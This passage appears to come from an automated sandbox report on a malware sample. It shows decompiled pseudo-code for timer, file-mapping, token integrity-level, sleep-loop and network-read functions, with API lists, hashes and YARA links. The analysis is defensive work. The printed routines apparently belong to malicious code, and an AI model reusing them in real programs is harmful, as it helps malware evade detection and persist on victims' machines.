							__eflags =  *0x303d280; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t60 = E030347D5();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x303d280);
								L21:
								L0303AED0();
								_v36.LowPart = _t60;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0); // executed
								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								_v8.LowPart = _t64;
								__eflags = _t64;
								if(_t64 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t70 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							HeapFree( *0x303d270, 0, _t54);
						}
						_t78 =  &(_t78[4]);
						_t70 = _t70 - 1;
					} while (_t70 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}




























                                                                                                            0x03035461
                                                                                                            0x03035473
                                                                                                            0x03035476
                                                                                                            0x03035482
                                                                                                            0x03035488
                                                                                                            0x0303548d
                                                                                                            0x030355f4
                                                                                                            0x03035493
                                                                                                            0x03035493
                                                                                                            0x03035495
                                                                                                            0x0303549a
                                                                                                            0x0303549b
                                                                                                            0x030354a1
                                                                                                            0x030354a4
                                                                                                            0x030354a7
                                                                                                            0x030354b5
                                                                                                            0x030354c0
                                                                                                            0x030354c3
                                                                                                            0x030354c5
                                                                                                            0x030354d2
                                                                                                            0x030354dc
                                                                                                            0x030354de
                                                                                                            0x030354e3
                                                                                                            0x030354e8
                                                                                                            0x030354f3
                                                                                                            0x030354f3
                                                                                                            0x030354ea
                                                                                                            0x030354ea
                                                                                                            0x030354f1
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x030354f1
                                                                                                            0x030354fd
                                                                                                            0x00000000
                                                                                                            0x03035500
                                                                                                            0x03035504
                                                                                                            0x0303550f
                                                                                                            0x0303550f
                                                                                                            0x03035516
                                                                                                            0x0303551f
                                                                                                            0x03035526
                                                                                                            0x0303552f
                                                                                                            0x03035532
                                                                                                            0x03035535
                                                                                                            0x0303553a
                                                                                                            0x0303553f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x03035541
                                                                                                            0x03035544
                                                                                                            0x03035547
                                                                                                            0x0303554a
                                                                                                            0x00000000
                                                                                                            0x0303554c
                                                                                                            0x0303555b
                                                                                                            0x0303555b
                                                                                                            0x00000000
                                                                                                            0x03035589
                                                                                                            0x03035589
                                                                                                            0x0303558e
                                                                                                            0x030355ad
                                                                                                            0x030355af
                                                                                                            0x030355b4
                                                                                                            0x030355b5
                                                                                                            0x00000000
                                                                                                            0x03035590
                                                                                                            0x03035590
                                                                                                            0x03035596
                                                                                                            0x00000000
                                                                                                            0x03035598
                                                                                                            0x03035598
                                                                                                            0x0303559d
                                                                                                            0x0303559f
                                                                                                            0x030355a4
                                                                                                            0x030355a5
                                                                                                            0x030355bb
                                                                                                            0x030355bb
                                                                                                            0x030355c3
                                                                                                            0x030355ce
                                                                                                            0x030355d1
                                                                                                            0x030355dc
                                                                                                            0x030355de
                                                                                                            0x030355e1
                                                                                                            0x030355e3
                                                                                                            0x00000000
                                                                                                            0x030355e9
                                                                                                            0x00000000
                                                                                                            0x030355e9
                                                                                                            0x030355e3
                                                                                                            0x03035596
                                                                                                            0x00000000
                                                                                                            0x0303558e
                                                                                                            0x0303555e
                                                                                                            0x03035560
                                                                                                            0x03035563
                                                                                                            0x03035564
                                                                                                            0x03035564
                                                                                                            0x03035568
                                                                                                            0x03035572
                                                                                                            0x03035572
                                                                                                            0x03035578
                                                                                                            0x0303557b
                                                                                                            0x0303557b
                                                                                                            0x03035581
                                                                                                            0x03035581
                                                                                                            0x030355fe
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • memset.NTDLL ref: 03035476
                                                                                                            • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 03035482
                                                                                                            • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 030354A7
                                                                                                            • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 030354C3
                                                                                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 030354DC
                                                                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 03035572
                                                                                                            • CloseHandle.KERNEL32(?), ref: 03035581
                                                                                                            • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 030355BB
                                                                                                            • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,030353C9,?), ref: 030355D1
                                                                                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 030355DC
                                                                                                              • Part of subcall function 0303502E: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05319370,00000000,?,747DF710,00000000,747DF730), ref: 0303507D
                                                                                                              • Part of subcall function 0303502E: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,053193A8,?,00000000,30314549,00000014,004F0053,05319364), ref: 0303511A
                                                                                                              • Part of subcall function 0303502E: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,030354EF), ref: 0303512C
                                                                                                            • GetLastError.KERNEL32 ref: 030355EE
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                                                                                            • String ID: Uxt$@MxtNxt
                                                                                                            • API String ID: 3521023985-2342693527
                                                                                                            • Opcode ID: 00f1b25108f7e2d9ff706c9e10b6a5ed61ec4006b97af7976182e6169bb329ad
                                                                                                            • Instruction ID: be08a06371b7b2839568d2c0cce3adf8055628370f46d8da9adb8995f21b36fa
                                                                                                            • Opcode Fuzzy Hash: 00f1b25108f7e2d9ff706c9e10b6a5ed61ec4006b97af7976182e6169bb329ad
                                                                                                            • Instruction Fuzzy Hash: 465158B1802228ABDF11EFA5DC449EEBFBDEF4A720F244616F411E61A4D7349640CBA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 03033598, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72filetimeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 74%
                                                                                                            			E03033598(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L0303AECA();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x303d2e0; // 0x22da5a8
				_t5 = _t13 + 0x303e876; // 0x5318e1e
				_t6 = _t13 + 0x303e59c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L0303ABEA();
				_t17 = CreateFileMappingW(0xffffffff, 0x303d2e4, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}













                                                                                                            0x03033598
                                                                                                            0x030335a0
                                                                                                            0x030335a4
                                                                                                            0x030335aa
                                                                                                            0x030335af
                                                                                                            0x030335b4
                                                                                                            0x030335b7
                                                                                                            0x030335ba
                                                                                                            0x030335bf
                                                                                                            0x030335c0
                                                                                                            0x030335c3
                                                                                                            0x030335c8
                                                                                                            0x030335cf
                                                                                                            0x030335d9
                                                                                                            0x030335db
                                                                                                            0x030335dc
                                                                                                            0x030335df
                                                                                                            0x030335fb
                                                                                                            0x03033601
                                                                                                            0x03033605
                                                                                                            0x03033653
                                                                                                            0x03033607
                                                                                                            0x03033614
                                                                                                            0x03033624
                                                                                                            0x0303362c
                                                                                                            0x0303363e
                                                                                                            0x03033642
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0303362e
                                                                                                            0x03033631
                                                                                                            0x03033636
                                                                                                            0x03033638
                                                                                                            0x03033638
                                                                                                            0x03033616
                                                                                                            0x03033618
                                                                                                            0x03033644
                                                                                                            0x03033645
                                                                                                            0x03033645
                                                                                                            0x03033614
                                                                                                            0x0303365a

                                                                                                            APIs
                                                                                                            • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,0303529C,?,?,4D283A53,?,?), ref: 030335A4
                                                                                                            • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 030335BA
                                                                                                            • _snwprintf.NTDLL ref: 030335DF
                                                                                                            • CreateFileMappingW.KERNELBASE(000000FF,0303D2E4,00000004,00000000,00001000,?), ref: 030335FB
                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0303529C,?,?,4D283A53), ref: 0303360D
                                                                                                            • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 03033624
                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,0303529C,?,?), ref: 03033645
                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0303529C,?,?,4D283A53), ref: 0303364D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                                                                            • String ID: @MxtNxt
                                                                                                            • API String ID: 1814172918-1701360479
                                                                                                            • Opcode ID: f080211639c2a838625fb7eaef1c144475b11051c9a9a5b04790bc75beaca1d2
                                                                                                            • Instruction ID: db4ed6117f53ad4a0e185e2e68c3ed65fd943234e4377ca3456c358d50de511b
                                                                                                            • Opcode Fuzzy Hash: f080211639c2a838625fb7eaef1c144475b11051c9a9a5b04790bc75beaca1d2
                                                                                                            • Instruction Fuzzy Hash: 96210F7AA42204BFE751EB68CC89FCE77ADAB86B10F244161F606EB281D770D5018B50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 03034151, Relevance: 10.6, APIs: 7, Instructions: 75COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E03034151(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x303d294 > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E030375F6(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E03034AAB(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}









                                                                                                            0x0303415e
                                                                                                            0x03034165
                                                                                                            0x0303416c
                                                                                                            0x03034180
                                                                                                            0x0303418b
                                                                                                            0x030341a3
                                                                                                            0x030341b0
                                                                                                            0x030341b3
                                                                                                            0x030341b8
                                                                                                            0x030341c3
                                                                                                            0x030341c7
                                                                                                            0x030341d6
                                                                                                            0x030341da
                                                                                                            0x030341f6
                                                                                                            0x030341f6
                                                                                                            0x030341fa
                                                                                                            0x030341fa
                                                                                                            0x030341ff
                                                                                                            0x03034203
                                                                                                            0x03034209
                                                                                                            0x0303420a
                                                                                                            0x03034211
                                                                                                            0x03034217

                                                                                                            APIs
                                                                                                            • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 03034183
                                                                                                            • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 030341A3
                                                                                                            • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 030341B3
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 03034203
                                                                                                              • Part of subcall function 030375F6: RtlAllocateHeap.NTDLL(00000000,00000000,03034F70), ref: 03037602
                                                                                                            • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 030341D6
                                                                                                            • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 030341DE
                                                                                                            • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 030341EE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 1295030180-0
                                                                                                            • Opcode ID: 6ee3d5012e6c7bae080b276c0e73f6c7fe7b037ad272405df782c9accdc7b09a
                                                                                                            • Instruction ID: 4f183558ef2da08beef79bfaef5dd9d7bc53d45a36985a783bf0708965ac0e88
                                                                                                            • Opcode Fuzzy Hash: 6ee3d5012e6c7bae080b276c0e73f6c7fe7b037ad272405df782c9accdc7b09a
                                                                                                            • Instruction Fuzzy Hash: 0F216A75901209FFEB00EFA5DC84EEEBBBDEF49704F0000A6F910A6150C7758A15DB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0303262F, Relevance: 9.1, APIs: 6, Instructions: 61sleepmemorytimeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 74%
                                                                                                            			E0303262F(void* __ecx, void* __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				void* _t10;
				void* _t12;
				int _t14;
				signed int _t16;
				void* _t18;
				signed int _t19;
				unsigned int _t23;
				void* _t27;
				signed int _t34;

				_t27 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t10 = HeapCreate(0, 0x400000, 0); // executed
				 *0x303d270 = _t10;
				if(_t10 != 0) {
					 *0x303d160 = GetTickCount();
					_t12 = E03031A24(_a4);
					if(_t12 == 0) {
						do {
							GetSystemTimeAsFileTime( &_v12);
							_t14 = SwitchToThread();
							_t23 = _v12.dwHighDateTime;
							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 5;
							_push(0);
							_push(0x13);
							_push(_t23 >> 5);
							_push(_t16);
							L0303B02E();
							_t34 = _t14 + _t16;
							_t18 = E03034F23(_a4, _t34);
							_t19 = 3;
							_t26 = _t34 & 0x00000007;
							Sleep(_t19 << (_t34 & 0x00000007)); // executed
						} while (_t18 == 1);
						if(E030327C7(_t26) != 0) {
							 *0x303d298 = 1; // executed
						}
						_t12 = E0303520D(_t27); // executed
					}
				} else {
					_t12 = 8;
				}
				return _t12;
			}













                                                                                                            0x0303262f
                                                                                                            0x03032635
                                                                                                            0x03032636
                                                                                                            0x03032642
                                                                                                            0x03032648
                                                                                                            0x0303264f
                                                                                                            0x0303265f
                                                                                                            0x03032664
                                                                                                            0x0303266b
                                                                                                            0x0303266d
                                                                                                            0x03032672
                                                                                                            0x03032678
                                                                                                            0x0303267e
                                                                                                            0x03032688
                                                                                                            0x0303268c
                                                                                                            0x0303268e
                                                                                                            0x03032693
                                                                                                            0x03032694
                                                                                                            0x03032695
                                                                                                            0x0303269a
                                                                                                            0x030326a0
                                                                                                            0x030326ab
                                                                                                            0x030326ac
                                                                                                            0x030326b2
                                                                                                            0x030326b8
                                                                                                            0x030326c4
                                                                                                            0x030326c6
                                                                                                            0x030326c6
                                                                                                            0x030326d0
                                                                                                            0x030326d0
                                                                                                            0x03032651
                                                                                                            0x03032653
                                                                                                            0x03032653
                                                                                                            0x030326da

                                                                                                            APIs
                                                                                                            • HeapCreate.KERNEL32(00000000,00400000,00000000,?,00000001,?,?,?,03031900,?), ref: 03032642
                                                                                                            • GetTickCount.KERNEL32 ref: 03032656
                                                                                                            • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,03031900,?), ref: 03032672
                                                                                                            • SwitchToThread.KERNEL32(?,00000001,?,?,?,03031900,?), ref: 03032678
                                                                                                            • _aullrem.NTDLL(?,?,00000013,00000000), ref: 03032695
                                                                                                            • Sleep.KERNEL32(00000003,00000000,?,00000001,?,?,?,03031900,?), ref: 030326B2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
                                                                                                            • String ID:
                                                                                                            • API String ID: 507476733-0
                                                                                                            • Opcode ID: b57a28f1abe1d33ad073a08c7a71202fdb9758f235a2e05cfa94ac0f63bbf5bf
                                                                                                            • Instruction ID: 7302f049b33b261e4f739c1337170f37dea98a70436d5fb922fd180e0f39e0c2
                                                                                                            • Opcode Fuzzy Hash: b57a28f1abe1d33ad073a08c7a71202fdb9758f235a2e05cfa94ac0f63bbf5bf
                                                                                                            • Instruction Fuzzy Hash: 7611A976A873046BE710FB74DC1DFDA77ECEB49351F140925F915DA180EBB4D44086A1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 03034F07, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120synchronizationCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 62%
                                                                                                            			E03034F07(void* __eax) {
				long _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				void* _v24;
				void* __esi;
				void* _t41;
				char* _t42;
				long _t43;
				void* _t46;
				intOrPtr _t47;
				intOrPtr* _t48;
				char _t50;
				long _t54;
				char* _t55;
				long _t56;
				intOrPtr* _t57;
				void* _t60;
				void* _t61;
				void* _t68;
				void* _t72;
				void* _t73;
				void* _t74;
				void* _t78;

				_t72 = __eax;
				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
					L2:
					_t41 = _t72;
					_pop(_t73);
					_t74 = _t41;
					_t42 =  &_v12;
					_v8 = 0;
					_v16 = 0;
					__imp__( *((intOrPtr*)(_t74 + 0x18)), _t42, _t68, _t73, _t61, _t78); // executed
					if(_t42 == 0) {
						_t43 = GetLastError();
						_v8 = _t43;
						if(_t43 == 0x2efe) {
							_v8 = 0;
							goto L29;
						}
					} else {
						if(_v12 == 0) {
							L29:
							 *((intOrPtr*)(_t74 + 0x30)) = 0;
						} else {
							_t46 =  *0x303d130(0, 1,  &_v24); // executed
							if(_t46 != 0) {
								_v8 = 8;
							} else {
								_t47 = E030375F6(0x1000);
								_v20 = _t47;
								if(_t47 == 0) {
									_v8 = 8;
								} else {
									goto L8;
									do {
										while(1) {
											L8:
											_t50 = _v12;
											if(_t50 >= 0x1000) {
												_t50 = 0x1000;
											}
											__imp__( *((intOrPtr*)(_t74 + 0x18)), _v20, _t50,  &_v16);
											if(_t50 == 0) {
												break;
											}
											_t57 = _v24;
											 *((intOrPtr*)( *_t57 + 0x10))(_t57, _v20, _v16, 0);
											_t18 =  &_v12;
											 *_t18 = _v12 - _v16;
											if( *_t18 != 0) {
												continue;
											} else {
											}
											L14:
											if(WaitForSingleObject( *0x303d2a4, 0) != 0x102) {
												_v8 = 0x102;
											} else {
												_t55 =  &_v12;
												__imp__( *((intOrPtr*)(_t74 + 0x18)), _t55); // executed
												if(_t55 != 0) {
													goto L19;
												} else {
													_t56 = GetLastError();
													_v8 = _t56;
													if(_t56 == 0x2f78 && _v12 == 0) {
														_v8 = 0;
														goto L19;
													}
												}
											}
											L22:
											E03034AAB(_v20);
											if(_v8 == 0) {
												_t54 = E03033B3F(_v24, _t74); // executed
												_v8 = _t54;
											}
											goto L25;
										}
										_v8 = GetLastError();
										goto L14;
										L19:
									} while (_v12 != 0);
									goto L22;
								}
								L25:
								_t48 = _v24;
								 *((intOrPtr*)( *_t48 + 8))(_t48);
							}
						}
					}
					return _v8;
				} else {
					_t60 = E0303121A(__eax); // executed
					if(_t60 != 0) {
						return _t60;
					} else {
						goto L2;
					}
				}
			}



























                                                                                                            0x03034f08
                                                                                                            0x03034f0e
                                                                                                            0x03034f19
                                                                                                            0x03034f19
                                                                                                            0x03034f1b
                                                                                                            0x03037613
                                                                                                            0x03037616
                                                                                                            0x0303761f
                                                                                                            0x03037622
                                                                                                            0x03037625
                                                                                                            0x0303762d
                                                                                                            0x0303772b
                                                                                                            0x03037731
                                                                                                            0x03037739
                                                                                                            0x0303773b
                                                                                                            0x00000000
                                                                                                            0x0303773b
                                                                                                            0x03037633
                                                                                                            0x03037636
                                                                                                            0x0303773e
                                                                                                            0x0303773e
                                                                                                            0x0303763c
                                                                                                            0x03037643
                                                                                                            0x0303764b
                                                                                                            0x03037722
                                                                                                            0x03037651
                                                                                                            0x03037657
                                                                                                            0x0303765c
                                                                                                            0x03037661
                                                                                                            0x03037710
                                                                                                            0x03037667
                                                                                                            0x00000000
                                                                                                            0x03037667
                                                                                                            0x03037667
                                                                                                            0x03037667
                                                                                                            0x03037667
                                                                                                            0x0303766c
                                                                                                            0x0303766e
                                                                                                            0x0303766e
                                                                                                            0x0303767b
                                                                                                            0x03037683
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x03037685
                                                                                                            0x03037692
                                                                                                            0x03037698
                                                                                                            0x03037698
                                                                                                            0x0303769b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0303769d
                                                                                                            0x030376a8
                                                                                                            0x030376bc
                                                                                                            0x030376f2
                                                                                                            0x030376be
                                                                                                            0x030376be
                                                                                                            0x030376c5
                                                                                                            0x030376cd
                                                                                                            0x00000000
                                                                                                            0x030376cf
                                                                                                            0x030376cf
                                                                                                            0x030376d5
                                                                                                            0x030376dd
                                                                                                            0x030376e4
                                                                                                            0x00000000
                                                                                                            0x030376e4
                                                                                                            0x030376dd
                                                                                                            0x030376cd
                                                                                                            0x030376f5
                                                                                                            0x030376f8
                                                                                                            0x03037700
                                                                                                            0x03037706
                                                                                                            0x0303770b
                                                                                                            0x0303770b
                                                                                                            0x00000000
                                                                                                            0x03037700
                                                                                                            0x030376a5
                                                                                                            0x00000000
                                                                                                            0x030376e7
                                                                                                            0x030376e7
                                                                                                            0x00000000
                                                                                                            0x030376f0
                                                                                                            0x03037717
                                                                                                            0x03037717
                                                                                                            0x0303771d
                                                                                                            0x0303771d
                                                                                                            0x0303764b
                                                                                                            0x03037636
                                                                                                            0x03037748
                                                                                                            0x03034f10
                                                                                                            0x03034f10
                                                                                                            0x03034f17
                                                                                                            0x03034f22
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x03034f17

                                                                                                            APIs
                                                                                                            • WaitForSingleObject.KERNEL32(00000000), ref: 030376AF
                                                                                                            • GetLastError.KERNEL32 ref: 030376CF
                                                                                                              • Part of subcall function 0303121A: wcstombs.NTDLL ref: 030312DC
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLastObjectSingleWaitwcstombs
                                                                                                            • String ID: @MxtNxt
                                                                                                            • API String ID: 2344289193-1701360479
                                                                                                            • Opcode ID: ddfb09df537277662f2398570d5380e343130e1419474d3445157e8ebf9676d7
                                                                                                            • Instruction ID: 018c9e5b845144009258c7e69ec624c11c4b41662e5dfe59af89a684b9b43f8c
                                                                                                            • Opcode Fuzzy Hash: ddfb09df537277662f2398570d5380e343130e1419474d3445157e8ebf9676d7
                                                                                                            • Instruction Fuzzy Hash: F0411AB5902219EFDF10EFA9D984AEEBBBCFF06745F1448A9E502E7240D7349A40DB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 03039311, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 29sleepmemoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 50%
                                                                                                            			E03039311(void** __esi) {
				intOrPtr _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				void* _t9;
				intOrPtr _t10;
				void* _t11;
				void** _t13;

				_t13 = __esi;
				_t4 =  *0x303d364; // 0x53195b0
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x303d364; // 0x53195b0
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t13;
				if(_t8 != 0 && _t8 != 0x303d030) {
					HeapFree( *0x303d270, 0, _t8);
				}
				_t9 = E03035141(_v0, _t13); // executed
				_t13[1] = _t9;
				_t10 =  *0x303d364; // 0x53195b0
				_t11 = _t10 + 0x40;
				__imp__(_t11);
				return _t11;
			}











                                                                                                            0x03039311
                                                                                                            0x03039311
                                                                                                            0x0303931a
                                                                                                            0x0303932a
                                                                                                            0x0303932a
                                                                                                            0x0303932f
                                                                                                            0x03039334
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x03039324
                                                                                                            0x03039324
                                                                                                            0x03039336
                                                                                                            0x0303933a
                                                                                                            0x0303934c
                                                                                                            0x0303934c
                                                                                                            0x03039357
                                                                                                            0x0303935c
                                                                                                            0x0303935f
                                                                                                            0x03039364
                                                                                                            0x03039368
                                                                                                            0x0303936e

                                                                                                            APIs
                                                                                                            • RtlEnterCriticalSection.NTDLL(05319570), ref: 0303931A
                                                                                                            • Sleep.KERNEL32(0000000A,?,03035390), ref: 03039324
                                                                                                            • HeapFree.KERNEL32(00000000,00000000,?,03035390), ref: 0303934C
                                                                                                            • RtlLeaveCriticalSection.NTDLL(05319570), ref: 03039368
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                                                                            • String ID: Uxt
                                                                                                            • API String ID: 58946197-1536154274
                                                                                                            • Opcode ID: f9ae0ea73953b2df59e1c27ec2f038f8a0cb6006b5a15faad27aab2cba5a5a45
                                                                                                            • Instruction ID: 9f7cdf8090be0b795759ea34d9b794b011d97bc069dee14be31d436f04eb7b56
                                                                                                            • Opcode Fuzzy Hash: f9ae0ea73953b2df59e1c27ec2f038f8a0cb6006b5a15faad27aab2cba5a5a45
                                                                                                            • Instruction Fuzzy Hash: 5DF0FEB1607380ABE724EF79DD88F567BECBB16740B084414F541D7195C764D850CB1A
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

